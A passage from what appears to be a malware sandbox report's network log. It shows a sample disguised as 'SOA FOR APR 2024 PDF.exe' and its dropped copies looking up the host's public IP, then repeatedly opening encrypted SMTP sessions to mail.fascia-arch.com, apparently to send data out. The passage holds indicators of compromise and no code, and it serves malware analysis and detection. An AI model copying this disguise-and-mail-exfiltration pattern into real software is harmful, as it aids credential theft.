                                Apr 26, 2024 09:03:49.863118887 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.863132954 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.863147974 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.863163948 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:49.863214970 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.863214970 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:49.908586979 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.059437990 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.059456110 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.059623957 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.060463905 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.060480118 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.060497046 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.060518026 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.060597897 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.060645103 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.104707956 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.111885071 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.145581007 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.151858091 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.255686045 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.255759001 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.255852938 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.255919933 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.256608009 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.257154942 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.257169962 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.257224083 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.257240057 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.257281065 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.257339001 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.307904959 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.308068037 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.308134079 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.308192015 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.308206081 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.308290005 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.348025084 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.348046064 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.451857090 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.451875925 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.451910019 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452054977 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452124119 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452172995 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452214003 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452404022 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452419043 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452456951 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452471972 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452517033 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.452636003 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.453289032 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.454092026 CEST5874973050.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:50.579930067 CEST49730587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:50.885596037 CEST49722587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:51.095730066 CEST5874972250.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:51.096206903 CEST49722587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:51.097160101 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:51.309824944 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:51.309958935 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:51.537533998 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:51.537756920 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:51.734724998 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:51.734898090 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:51.936153889 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:51.939857006 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:52.147428989 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.147476912 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.147514105 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.147540092 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:52.149123907 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:52.347474098 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.352067947 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:52.548588991 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.548878908 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:52.745918989 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.746193886 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:52.959876060 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:52.960073948 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.156646967 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.156831980 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.394418001 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.401365995 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.401570082 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.597970009 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.598151922 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.721146107 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.760303974 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.760404110 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.760404110 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.761388063 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.762022018 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.956758022 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.956775904 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.957585096 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.957616091 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:53.959384918 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:53.959549904 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.005028009 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.010035992 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.155953884 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.156486034 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.156501055 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.158734083 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.206465006 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.206542969 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.363863945 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.363909006 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.363957882 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.363965988 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364001036 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.364017963 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:54.364021063 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364063978 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364155054 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364197969 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364243984 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364285946 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364335060 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364377022 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364419937 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364484072 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364542961 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364589930 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364629984 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364681959 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.364742994 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.403131962 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.403188944 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.403255939 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.403295994 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560272932 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560331106 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560355902 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560393095 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560421944 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560564995 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560606956 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560683966 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560705900 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:54.560762882 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.276185989 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:55.276277065 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:55.276299000 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:55.276319981 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:55.472595930 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.472647905 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.472680092 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.472712040 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.472742081 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.472773075 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.473666906 CEST5874973150.87.195.61192.168.2.5
                                Apr 26, 2024 09:03:55.517931938 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:55.882339001 CEST49731587192.168.2.550.87.195.61
                                Apr 26, 2024 09:03:56.079185963 CEST5874973150.87.195.61192.168.2.5
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Apr 26, 2024 09:01:57.879776001 CEST | 60720 | 53 | 192.168.2.5 | 1.1.1.1
                                Apr 26, 2024 09:01:58.005095005 CEST | 53 | 60720 | 1.1.1.1 | 192.168.2.5
                                Apr 26, 2024 09:01:59.480166912 CEST | 60338 | 53 | 192.168.2.5 | 1.1.1.1
                                Apr 26, 2024 09:01:59.687926054 CEST | 53 | 60338 | 1.1.1.1 | 192.168.2.5
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Apr 26, 2024 09:01:57.879776001 CEST | 192.168.2.5 | 1.1.1.1 | 0x76d8 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                Apr 26, 2024 09:01:59.480166912 CEST | 192.168.2.5 | 1.1.1.1 | 0x3aad | Standard query (0) | mail.fascia-arch.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Apr 26, 2024 09:01:58.005095005 CEST | 1.1.1.1 | 192.168.2.5 | 0x76d8 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                Apr 26, 2024 09:01:58.005095005 CEST | 1.1.1.1 | 192.168.2.5 | 0x76d8 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                Apr 26, 2024 09:01:58.005095005 CEST | 1.1.1.1 | 192.168.2.5 | 0x76d8 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                Apr 26, 2024 09:01:59.687926054 CEST | 1.1.1.1 | 192.168.2.5 | 0x3aad | No error (0) | mail.fascia-arch.com | | 50.87.195.61 | A (IP address) | IN (0x0001) | false
                                • api.ipify.org
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.5 | 49708 | 104.26.12.205 | 443 | 7384 | C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-04-26 07:01:58 UTC | 155 | OUT | GET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:01:58 UTC | 211 | IN | HTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:01:58 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b460dc454c2c-MIA
                                2024-04-26 07:01:58 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.5 | 49712 | 104.26.12.205 | 443 | 7788 | C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-04-26 07:02:03 UTC | 155 | OUT | GET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:02:03 UTC | 211 | IN | HTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:02:03 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b4822ee66dcd-MIA
                                2024-04-26 07:02:03 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.5 | 49721 | 104.26.12.205 | 443 | 7176 | C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-04-26 07:02:13 UTC | 155 | OUT | GET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:02:14 UTC | 211 | IN | HTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:02:13 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b4c0ec08b3e9-MIA
                                2024-04-26 07:02:14 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.5 | 49723 | 104.26.12.205 | 443 | 7364 | C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-04-26 07:02:21 UTC | 155 | OUT | GET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2024-04-26 07:02:22 UTC | 211 | IN | HTTP/1.1 200 OK
                                Date: Fri, 26 Apr 2024 07:02:22 GMT
                                Content-Type: text/plain
                                Content-Length: 15
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 87a4b4f43f602878-MIA
                                2024-04-26 07:02:22 UTC | 15 | IN | Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                Data Ascii: 102.129.152.220


                                Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                Apr 26, 2024 09:02:00.184763908 CEST | 587 | 49711 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:00 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:00.186783075 CEST | 49711 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:02:00.383451939 CEST | 587 | 49711 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:00.383615017 CEST | 49711 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:02:00.581645012 CEST | 587 | 49711 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:02:04.995862961 CEST | 587 | 49713 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:04 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:04.996057987 CEST | 49713 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:02:05.192907095 CEST | 587 | 49713 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:05.193202019 CEST | 49713 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:02:05.394184113 CEST | 587 | 49713 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:02:15.062194109 CEST | 587 | 49722 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:14 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:15.062402010 CEST | 49722 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:02:15.259160995 CEST | 587 | 49722 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:15.259377003 CEST | 49722 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:02:15.457284927 CEST | 587 | 49722 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:02:23.580065966 CEST | 587 | 49724 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:02:23 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:02:23.580344915 CEST | 49724 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:02:23.776743889 CEST | 587 | 49724 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:02:23.776953936 CEST | 49724 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:02:23.974812031 CEST | 587 | 49724 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:03:38.543343067 CEST | 587 | 49728 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:38 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:38.543483973 CEST | 49728 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:03:38.624387026 CEST | 587 | 49729 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:38 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:38.624552965 CEST | 49729 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:03:38.739939928 CEST | 587 | 49728 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:38.740134001 CEST | 49728 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:03:38.820370913 CEST | 587 | 49729 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:38.820543051 CEST | 49729 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:03:38.937556982 CEST | 587 | 49728 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:03:39.018364906 CEST | 587 | 49729 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:03:46.414268017 CEST | 587 | 49730 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:46 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:46.414396048 CEST | 49730 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:03:46.611557007 CEST | 587 | 49730 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:46.611768961 CEST | 49730 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:03:46.809900045 CEST | 587 | 49730 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:03:51.537533998 CEST | 587 | 49731 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:51 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:51.537756920 CEST | 49731 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:03:51.734724998 CEST | 587 | 49731 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:51.734898090 CEST | 49731 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:03:51.936153889 CEST | 587 | 49731 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:03:56.566600084 CEST | 587 | 49732 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:03:56 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:03:56.566752911 CEST | 49732 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:03:56.763576031 CEST | 587 | 49732 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:03:56.763776064 CEST | 49732 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:03:56.961771011 CEST | 587 | 49732 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:04:06.202986956 CEST | 587 | 49733 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:04:06 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:04:06.204030991 CEST | 49733 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:04:06.705445051 CEST | 49733 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:04:07.038124084 CEST | 587 | 49733 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:04:07.038494110 CEST | 49733 | 587 | 192.168.2.5 | 50.87.195.61 | STARTTLS
                                Apr 26, 2024 09:04:07.237658024 CEST | 587 | 49733 | 50.87.195.61 | 192.168.2.5 | 220 TLS go ahead
                                Apr 26, 2024 09:04:09.286659956 CEST | 587 | 49735 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:04:09 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
